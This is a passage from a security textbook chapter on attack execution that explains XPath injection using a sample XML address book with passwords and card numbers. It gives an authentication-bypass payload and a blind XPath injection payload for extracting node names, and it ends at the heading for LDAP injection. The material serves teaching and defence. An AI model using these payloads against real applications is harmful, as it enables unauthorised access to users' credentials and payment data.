Chapter 6 - Attack execution ( 2 ) P a g e | 127
< firstName > Chris </ firstName > < surname > Dawes </ surname > < password > secret </ password > < email > cdawes @ craftnet . de </ email > < ccard > 3981 2491 3242 3121 </ ccard > </ address > < address > < firstName > James </ firstName > < surname > Hunter </ surname > < password > letmein </ password > < email > james . hunter @ pookmail . com </ email > < ccard > 8113 5320 8014 3313 </ ccard > </ address > </ addressBook >
The following XPath query effectively verifies the user-supplied credentials and retrieves the relevant user ’ s credit card number :
// address [ surname / text ()=’ Dawes ’ and password / text ()=’ secret ’]/ ccard / text ()
Attack : The usage of the value ( ‘ or ‘ a ’=’ a ) as password will result retrieving the credit card information for all users . If the structure of the document is not known it will be difficult to know how exactly what to write , usually we solve this problem using what is called blind Xpath injection .
‘ or substring ( name ( parent ::*[ position ()= 1 ]), 2,1 )=’ a ‘ or substring ( name ( parent ::*[ position ()= 1 ]), 2,1 )=’ b ‘ or substring ( name ( parent ::*[ position ()= 1 ]), 2,1 )=’ c ‘ or substring ( name ( parent ::*[ position ()= 1 ]), 2,1 )=’ d Etc …
The previous listing can be used to extract node names .
6.12 LDAP injection